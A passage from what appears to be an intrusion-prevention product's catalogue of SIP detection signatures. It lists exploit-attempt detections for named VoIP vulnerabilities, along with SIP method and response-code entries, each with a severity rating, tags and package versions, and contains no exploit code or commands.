Tags: Any Operating System, Any Hardware, Digium Asterisk, Teluu Ltd. PJPROJECT, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-937-5242
Last changed: sgpkg-ips-937-5242
Vulnerability: Digium-Asterisk-pjsip_Multipart_Parse-Denial-Of-Service
Description:
Back to top

SIP-UDP_Digium-Asterisk-Res_pjsip_pubsub-Module-SIP-Subscribe-Type-Confusion-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Asterisk Asterisk Open Source detected
Context: SIP UDP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Digium Asterisk, CVE2014, Any Operating System not specific, Suspected Denial of Service, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-623-5211
Last changed: sgpkg-ips-870-5242
Vulnerability: Asterisk-Res_pjsip_pubsub-Module-SIP-Subscribe-Type-Confusion-Denial-Of-Service
Description:
Back to top

SIP-UDP_Grandstream-GXV-3000-SIP-Phone-Remote-Eavesdropping

About this situation: An attempt to exploit a vulnerability in Grandstream GXV-3000 SIP Phone detected
Context: SIP UDP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Grandstream GXV-3000 SIP Phone, CVE2007, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-674-5211
Last changed: sgpkg-ips-674-5211
Vulnerability: Grandstream-GXV-3000-SIP-Phone-Remote-Eavesdropping
Description:
Back to top

SIP-UDP_IBM-WebSphere-Application-Server-SIP-Processing-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in IBM WebSphere Application Server detected
Context: SIP UDP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, IBM WebSphere Application Server, CVE2016, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-796-5211
Last changed: sgpkg-ips-796-5211
Vulnerability: IBM-WebSphere-Application-Server-SIP-Processing-Denial-Of-Service
Description:
Back to top

SIP-UDP_Realtek-SDK-SIP-ALG-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in the Realtek SDK detected
Context: SIP UDP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Realtek SDK, CVE2022, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1494-5242
Last changed: sgpkg-ips-1494-5242
Vulnerability: Realtek-SDK-SIP-ALG-Buffer-Overflow
Description:
Back to top

SIP-UDP_Suspicious-Message

About this situation: A suspicious SIP message has been detected
Context: SIP UDP Client Stream
Severity: 7
Tags: Any Operating System, x86, Generic SIP application, Any Operating System not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-578-5211
Last changed: sgpkg-ips-578-5211
Description:
Back to top

SIP-UDP_Wireshark-SigComp-Buffer-Overflow-Vulnerability

About this situation: An attempt to exploit a Wireshark SigComp Buffer Overflow Vulnerability detected.
Context: SIP UDP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Wireshark, CVE2010, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-694-5211
Last changed: sgpkg-ips-694-5211
Vulnerability: Wireshark-SigComp-Buffer-Overflow-Vulnerability
Description:
Back to top

Sipgate-UK

About this situation: Application Sipgate-UK detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Sipgate is a completely web-based telephony solution for teams and enterprises. 'sipgate team' also includes full fax, SMS and voicemail functionality.
Back to top

SIP_Asterisk-pjsip-Invalid-Fmtp-Media-Attribute-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Asterisk Asterisk Open Source detected
Context: SIP stream
Severity: 7
Tags: Any Operating System, Any Hardware, Digium Asterisk, CVE2018, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1077-5242
Last changed: sgpkg-ips-1077-5242
Vulnerability: Asterisk-pjsip-Invalid-Fmtp-Media-Attribute-Denial-Of-Service
Description:
Back to top

SIP_Call-Established

About this situation: SIP phone call established
Context: SIP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-143-2032
Description: SIP phone call established Risk analysis: Risk level is fairly low.
Back to top

SIP_Call-Hang-Up

About this situation: SIP phone call hang up
Context: SIP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-143-2032
Description: SIP phone call hang up Risk analysis: Risk level is fairly low.
Back to top

SIP_Digium-Asterisk-Cdr-Ast_Cdr_Setuserfield-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Digium Asterisk Open Source detected
Context: SIP stream
Severity: 7
Tags: Any Operating System, Any Hardware, Digium Asterisk, CVE2017, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-880-5242
Last changed: sgpkg-ips-880-5242
Vulnerability: Digium-Asterisk-Cdr-Ast_Cdr_Setuserfield-Buffer-Overflow
Description:
Back to top

SIP_Digium-Asterisk-Cdr_Object_Update_Party_B_Userfield_Cb-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Digium Asterisk Open Source detected
Context: SIP stream
Severity: 7
Tags: Any Operating System, Any Hardware, Digium Asterisk, CVE2017, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1019-5242
Last changed: sgpkg-ips-1019-5242
Vulnerability: Asterisk-Cdr_Object_Update_Party_B_Userfield_Cb-Buffer-Overflow
Description:
Back to top

SIP_Digium-Asterisk-CSeq-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Digium Asterisk Open Source detected
Context: SIP stream
Severity: 7
Tags: Any Operating System, Any Hardware, Digium Asterisk, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-919-5242
Last changed: sgpkg-ips-919-5242
Vulnerability: Digium-Asterisk-CSeq-Heap-Buffer-Overflow
Description:
Back to top

SIP_Digium-Asterisk-pjsip-Contact-Header-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Digium Asterisk Open Source detected
Context: SIP stream
Severity: 7
Tags: Any Operating System, Any Hardware, Digium Asterisk, CVE2017, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1032-5242
Last changed: sgpkg-ips-1032-5242
Vulnerability: Digium-Asterisk-pjsip-Contact-Header-Denial-Of-Service
Description:
Back to top

SIP_Digium-Asterisk-pjsip-In-Dialog-Message-Request-Denial-of-Service

About this situation: An attempt to exploit a vulnerability in Digium Asterisk Open Source detected
Context: SIP stream
Severity: 7
Tags: Any Operating System, Any Hardware, Digium Asterisk, CVE2019, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1183-5242
Last changed: sgpkg-ips-1185-5242
Vulnerability: Digium-Asterisk-pjsip-In-Dialog-Message-Request-Denial-of-Service
Description:
Back to top

SIP_Digium-Asterisk-Res_pjsip_pubsub-Out-Of-Bounds-Write

About this situation: An attempt to exploit a vulnerability in Digium Asterisk Open Source detected
Context: SIP stream
Severity: 7
Tags: Any Operating System, Any Hardware, Digium Asterisk, CVE2018, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1049-5242
Last changed: sgpkg-ips-1049-5242
Vulnerability: Digium-Asterisk-Res_pjsip_pubsub-Out-Of-Bounds-Write
Description:
Back to top

SIP_Empty-Contact-Header

About this situation: Matches when a SIP message with an empty Contact header is seen
Context: SIP stream
Severity: 2
Tags: Any Operating System, Any Hardware, Generic SIP application, CVE2011, Any Operating System not specific, Protocol Violations, Anomalies
First detected in: sgpkg-ips-420-4219
Last changed: sgpkg-ips-452-4333
Vulnerability: Digium-Asterisk-SIP-Channel-Driver-Denial-Of-Service
Description:
Back to top

SIP_Invalid-CSeq-Header

About this situation: Matches an invalid SIP CSeq header
Context: SIP stream
Severity: 2
Tags: Any Operating System, Any Hardware, Generic SIP application, Any Operating System not specific, Protocol Violations, Anomalies
First detected in: sgpkg-ips-563-5211
Last changed: sgpkg-ips-563-5211
Description:
Back to top

SIP_Message-Handled

About this situation: SIP message successfully parsed and handled
Context: SIP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-143-2032
Description: A SIP message successfully parsed and handled Risk analysis: Risk level is fairly low.
Back to top

SIP_Message-No-Transaction

About this situation: SIP message not belonging to any existing transaction seen
Context: SIP without parameters
Severity: 1
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: A SIP message not belonging to any existing transaction was seen. Risk analysis: Risk level is fairly low.
Back to top

SIP_Message-Parse-Error

About this situation: SIP message processing failed because of parse error
Context: SIP without parameters
Severity: 1
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: SIP message processing failed because of a parse error. Risk analysis: Risk level is fairly low.
Back to top

SIP_Method-ACK

About this situation: Matches when SIP method ACK is seen in a SIP request
Context: SIP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-143-2032
Description: The SIP request method ACK was seen in a SIP request. Risk analysis: Risk level is low.
Back to top

SIP_Method-BYE

About this situation: Matches when SIP method BYE is seen in a SIP request
Context: SIP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-143-2032
Description: The SIP request method BYE was seen in a SIP request. Risk analysis: Risk level is low.
Back to top

SIP_Method-CANCEL

About this situation: Matches when SIP method CANCEL is seen in a SIP request
Context: SIP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-143-2032
Description: The SIP request method CANCEL was seen in a SIP request. Risk analysis: Risk level is low.
Back to top

SIP_Method-INFO

About this situation: Matches when SIP method INFO is seen in a SIP request
Context: SIP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-174-2032
Last changed: sgpkg-ips-174-2032
Description: The SIP request method INFO was seen in a SIP request. Risk analysis: Risk level is low.
Back to top

SIP_Method-INVITE

About this situation: Matches when SIP method INVITE is seen in a SIP request
Context: SIP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-143-2032
Description: The SIP request method INVITE was seen in a SIP request. Risk analysis: Risk level is low.
Back to top

SIP_Method-MESSAGE

About this situation: Matches when SIP method MESSAGE is seen in a SIP request
Context: SIP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-143-2032
Description: The SIP request method MESSAGE was seen in a SIP request. Risk analysis: Risk level is low.
Back to top

SIP_Method-NOTIFY

About this situation: Matches when SIP method NOTIFY is seen in a SIP request
Context: SIP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-143-2032
Description: The SIP request method NOTIFY was seen in a SIP request. Risk analysis: Risk level is low.
Back to top

SIP_Method-OPTIONS

About this situation: Matches when SIP method OPTIONS is seen in a SIP request
Context: SIP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-143-2032
Description: The SIP request method OPTIONS was seen in a SIP request. Risk analysis: Risk level is low.
Back to top

SIP_Method-PRACK

About this situation: Matches when SIP method PRACK is seen in a SIP request
Context: SIP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-174-2032
Last changed: sgpkg-ips-174-2032
Description: The SIP request method PRACK was seen in a SIP request. Risk analysis: Risk level is low.
Back to top

SIP_Method-PUBLISH

About this situation: Matches when SIP method PUBLISH is seen in a SIP request
Context: SIP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-174-2032
Last changed: sgpkg-ips-174-2032
Description: The SIP request method PUBLISH was seen in a SIP request. Risk analysis: Risk level is low.
Back to top

SIP_Method-REFER

About this situation: Matches when SIP method REFER is seen in a SIP request
Context: SIP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-143-2032
Description: The SIP request method REFER was seen in a SIP request. Risk analysis: Risk level is low.
Back to top

SIP_Method-REGISTER

About this situation: Matches when SIP method REGISTER is seen in a SIP request
Context: SIP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-143-2032
Description: The SIP request method REGISTER was seen in a SIP request. Risk analysis: Risk level is low.
Back to top

SIP_Method-REGISTER-Without-Contact-Header

About this situation: Matches when a SIP REGISTER method without a Contact header is seen
Context: SIP stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic SIP application, CVE2011, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-420-4219
Last changed: sgpkg-ips-452-4333
Vulnerability: Digium-Asterisk-SIP-Channel-Driver-Denial-Of-Service
Description:
Back to top

SIP_Method-SUBSCRIBE

About this situation: Matches when SIP method SUBSCRIBE is seen in a SIP request
Context: SIP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-143-2032
Description: The SIP request method SUBSCRIBE was seen in a SIP request. Risk analysis: Risk level is low.
Back to top

SIP_Method-Unknown

About this situation: Matches when unknown SIP method is seen in a SIP request
Context: SIP without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-143-2032
Description: The SIP request method seen in a SIP request was unknown. Risk analysis: Risk level is low.
Back to top

SIP_Method-UPDATE

About this situation: Matches when SIP method UPDATE is seen in a SIP request
Context: SIP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-174-2032
Last changed: sgpkg-ips-174-2032
Description: The SIP request method UPDATE was seen in a SIP request. Risk analysis: Risk level is low.
Back to top

SIP_Response-100-Trying

About this situation: Matches when a SIP response with 100 Trying status code is seen
Context: SIP stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic SIP application, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-404-4219
Last changed: sgpkg-ips-452-4333
Description:
Back to top

SIP_Response-180-Ringing

About this situation: Matches when a SIP response with 180 Ringing response code is seen
Context: SIP stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic SIP application, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-404-4219
Last changed: sgpkg-ips-452-4333
Description:
Back to top

SIP_Response-181-Call-Forwarded

About this situation: Matches when a SIP response with 181 Call Forwarded response code is seen
Context: SIP stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic SIP application, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-404-4219
Last changed: sgpkg-ips-452-4333
Description:
Back to top

SIP_Response-182-Queued

About this situation: Matches when a SIP response with 182 Queued response code is seen
Context: SIP stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic SIP application, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-404-4219
Last changed: sgpkg-ips-452-4333
Description:
Back to top

SIP_Response-183-Session-Progress

About this situation: Matches when a SIP response with 183 Session Progress response code is seen
Context: SIP stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic SIP application, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-404-4219
Last changed: sgpkg-ips-452-4333
Description:
Back to top

SIP_Response-200-OK

About this situation: Matches when a SIP response with 200 OK response code is seen
Context: SIP stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic SIP application, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-404-4219
Last changed: sgpkg-ips-452-4333
Description:
Back to top

SIP_Response-300-Multiple-Choises

About this situation: Matches when a SIP response with 300 Multiple Choises response code is seen
Context: SIP stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic SIP application, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-404-4219
Last changed: sgpkg-ips-452-4333
Description:
Back to top

SIP_Response-301-Moved-Permanently

About this situation: Matches when a SIP response with 301 Moved Permanently response code is seen
Context: SIP stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic SIP application, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-404-4219
Last changed: sgpkg-ips-452-4333
Description:
Back to top

SIP_Response-302-Moved-Temporarily

About this situation: Matches when a SIP response with 302 Moved Temporarily response code is seen
Context: SIP stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic SIP application, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-404-4219
Last changed: sgpkg-ips-452-4333
Description:
Back to top

SIP_Response-305-Use-Proxy

About this situation: Matches when a SIP response with 305 Use Proxy response code is seen
Context: SIP stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic SIP application, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-404-4219
Last changed: sgpkg-ips-452-4333
Description:
Back to top

SIP_Response-380-Alternative-Service

About this situation: Matches when a SIP response with 380 Alternative Service response code is seen
Context: SIP stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic SIP application, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-404-4219
Last changed: sgpkg-ips-452-4333
Description:
Back to top

SIP_Response-400-Bad-Request

About this situation: Matches when a SIP response with 400 Bad Request response code is seen
Context: SIP stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic SIP application, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-404-4219
Last changed: sgpkg-ips-452-4333
Description:
Back to top

SIP_Response-401-Unauthorized

About this situation: Matches when a SIP response with 401 Unauthorized response code is seen
Context: SIP stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic SIP application, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-404-4219
Last changed: sgpkg-ips-452-4333
Description:
Back to top

SIP_Response-402-Payment-Required

About this situation: Matches when a SIP response with 402 Payment Required response code is seen
Context: SIP stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic SIP application, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-404-4219
Last changed: sgpkg-ips-452-4333
Description:
Back to top

SIP_Response-403-Forbidden

About this situation: Matches when a SIP response with 403 Forbidden response code is seen
Context: SIP stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic SIP application, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-404-4219
Last changed: sgpkg-ips-452-4333
Description:
Back to top

SIP_Response-404-Not-Found

About this situation: Matches when a SIP response with 404 Not Found code is seen
Context: SIP stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic SIP application, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-404-4219
Last changed: sgpkg-ips-452-4333
Description:
Back to top

SIP_Response-405-Method-Not-Allowed

About this situation: Matches when a SIP response with 405 Method Not Allowed status code is seen
Context: SIP stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic SIP application, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-404-4219
Last changed: sgpkg-ips-452-4333
Description:
Back to top

SIP_Response-406-Not-Acceptable

About this situation: Matches when a SIP response with 406 Not Acceptable status code is seen
Context: SIP stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic SIP application, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-404-4219
Last changed: sgpkg-ips-452-4333
Description:
Back to top

SIP_Response-407-Proxy-Authentication-Required

About this situation: Matches when a SIP response with 407 Proxy-Authentication Required status code is seen
Context: SIP stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic SIP application, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-404-4219
Last changed: sgpkg-ips-452-4333
Description:
Back to top

SIP_Response-408-Request-Timeout

About this situation: Matches when a SIP response with 408 Request Timeout status code is seen
Context: SIP stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic SIP application, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-404-4219
Last changed: sgpkg-ips-452-4333
Description:
Back to top

SIP_Response-410-Gone

About this situation: Matches when a SIP response with 410 Gone response code is seen
Context: SIP stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic SIP application, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-404-4219
Last changed: sgpkg-ips-452-4333
Description:
Back to top

SIP_Response-412-Conditional-Request-Failed

About this situation: Matches when a SIP response with 412 Conditional Request Failed response code is seen
Context: SIP stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic SIP application, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-404-4219
Last changed: sgpkg-ips-452-4333
Description:
Back to top

SIP_Response-413-Request-Entity-Too-Large

About this situation: Matches when a SIP response with 413 Request Entity Too Large response code is seen
Context: SIP stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic SIP application, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-404-4219
Last changed: sgpkg-ips-452-4333
Description:
Back to top

SIP_Response-414-Request-URI-Too-Long

About this situation: Matches when a SIP response with 414 Request-URI Too Long response code is seen
Context: SIP stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic SIP application, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-404-4219
Last changed: sgpkg-ips-452-4333
Description:
Back to top

SIP_Response-415-Unsupported-Media-Type

About this situation: Matches when a SIP response with 415 Unsupported Media Type response code is seen
Context: SIP stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic SIP application, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-404-4219
Last changed: sgpkg-ips-452-4333
Description:
Back to top

SIP_Response-416-Unsupported-URI-Scheme

About this situation: Matches when a SIP response with 416 Unsupported URI Scheme response code is seen
Context: SIP stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic SIP application, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-404-4219
Last changed: sgpkg-ips-452-4333
Description:
Back to top

SIP_Response-421-Extension-Required

About this situation: Matches when a SIP response with 421 Extension Required response code is seen
Context: SIP stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic SIP application, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-404-4219
Last changed: sgpkg-ips-452-4333
Description:
Back to top

SIP_Response-423-Interval-Too-Brief

About this situation: Matches when a SIP response with 423 Interval Too Brief
Context: SIP stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic SIP application, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-404-4219
Last changed: sgpkg-ips-452-4333
Description:
Back to top

SIP_Response-428-Use-Identity-Header

About this situation: Matches when a SIP response with 428 Use Identity Header response code is seen
Context: SIP stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic SIP application, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-404-4219
Last changed: sgpkg-ips-452-4333
Description:
Back to top

SIP_Response-429-Provide-Referrer-Identity

About this situation: Matches when a SIP response with 429 Referrer Identity response code is seen
Context: SIP stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic SIP application, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-404-4219
Last changed: sgpkg-ips-452-4333
Description:
Back to top

SIP_Response-430-Flow-Failed

About this situation: Matches when a SIP response with 430 Flow Failed response code is seen
Context: SIP stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic SIP application, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-404-4219
Last changed: sgpkg-ips-452-4333
Description:
Back to top

SIP_Response-433-Anonymity-Disallowed

About this situation: Matches when a SIP response with 433 Anonymity Disallowed response code is seen
Context: SIP stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic SIP application, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-404-4219
Last changed: sgpkg-ips-452-4333
Description:
Back to top

SIP_Response-436-Bad-Identity-Info

About this situation: Matches when a SIP response with 436 Bad Identity-Info response code is seen
Context: SIP stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic SIP application, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-404-4219
Last changed: sgpkg-ips-452-4333
Description:
Back to top

SIP_Response-437-Unsupported-Certificate

About this situation: Matches when a SIP response with 437 Unsupported Certificate response code is seen
Context: SIP stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic SIP application, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-404-4219
Last changed: sgpkg-ips-452-4333
Description:
Back to top

SIP_Response-438-Invalid-Identity-Header

About this situation: Matches when a SIP response with 438 Invalid Identity Header response code is seen
Context: SIP stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic SIP application, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-404-4219
Last changed: sgpkg-ips-452-4333
Description:
Back to top

SIP_Response-439-First-Hop-Lacks-Outbound-Support

About this situation: Matches when a SIP response with 439 First Hop Lacks Outbound Support response code is seen
Context: SIP stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic SIP application, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-404-4219
Last changed: sgpkg-ips-452-4333
Description:
Back to top

SIP_Response-480-Temporarily-Unavailable

About this situation: Matches when a SIP response with 480 Temporarily Unavailable response code is seen
Context: SIP stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic SIP application, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-404-4219
Last changed: sgpkg-ips-452-4333
Description:
Back to top

SIP_Response-481-Call-Or-Transaction-Does-Not-Exist

About this situation: Matches when a SIP response with 481 Call/Transaction Does Not Exist response code is seen
Context: SIP stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic SIP application, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-404-4219
Last changed: sgpkg-ips-452-4333
Description:
Back to top

SIP_Response-482-Loop-Detected

About this situation: Matches when a SIP response with 482 Loop Detected response code is seen
Context: SIP stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic SIP application, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-404-4219
Last changed: sgpkg-ips-452-4333
Description:
Back to top

SIP_Response-483-Too-Many-Hops

About this situation: Matches when a SIP response with 483 Too Many Hops response code is seen
Context: SIP stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic SIP application, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-404-4219
Last changed: sgpkg-ips-452-4333
Description:
Back to top

SIP_Response-484-Address-Incomplete

About this situation: Matches when a SIP response with 484 Address Incomplete response code is seen
Context: SIP stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic SIP application, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-404-4219
Last changed: sgpkg-ips-452-4333
Description:
Back to top

SIP_Response-485-Ambiguous

About this situation: Matches when a SIP response with 485 Ambiguous response code is seen
Context: SIP stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic SIP application, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-404-4219
Last changed: sgpkg-ips-452-4333
Description:
Back to top

SIP_Response-486-Busy-Here

About this situation: Matches when a SIP response with 486 Busy Here response code is seen
Context: SIP stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic SIP application, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-404-4219
Last changed: sgpkg-ips-452-4333
Description:
Back to top

SIP_Response-487-Request-Terminated

About this situation: Matches when a SIP response with 487 Request Terminated response code is seen
Context: SIP stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic SIP application, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-404-4219
Last changed: sgpkg-ips-452-4333
Description:
Back to top

SIP_Response-488-Not-Acceptable-Here

About this situation: Matches when a SIP response with 488 Not Acceptable Here response code is seen
Context: SIP stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic SIP application, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-404-4219
Last changed: sgpkg-ips-452-4333
Description:
Back to top

SIP_Response-489-Bad-Event

About this situation: Matches when a SIP response with 489 Bad Event response code is seen
Context: SIP stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic SIP application, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-404-4219
Last changed: sgpkg-ips-452-4333
Description:
Back to top

SIP_Response-491-Request-Pending

About this situation: Matches when a SIP response with 491 Request Pending response code is seen
Context: SIP stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic SIP application, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-404-4219
Last changed: sgpkg-ips-452-4333
Description:
Back to top

SIP_Response-493-Undecipherable

About this situation: Matches when a SIP response with 493 Undecipherable response code is seen
Context: SIP stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic SIP application, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-404-4219
Last changed: sgpkg-ips-452-4333
Description:
Back to top

SIP_Response-494-Security-Agreement-Required

About this situation: Matches when a SIP response with 494 Security Agreement Required response code is seen
Context: SIP stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic SIP application, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-404-4219
Last changed: sgpkg-ips-452-4333
Description:
Back to top

SIP_Response-500-Server-Internal-Error

About this situation: Matches when a SIP response with 500 Server Internal Error response code is seen
Context: SIP stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic SIP application, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-404-4219
Last changed: sgpkg-ips-452-4333
Description:
Back to top

SIP_Response-501-Not-Implemented

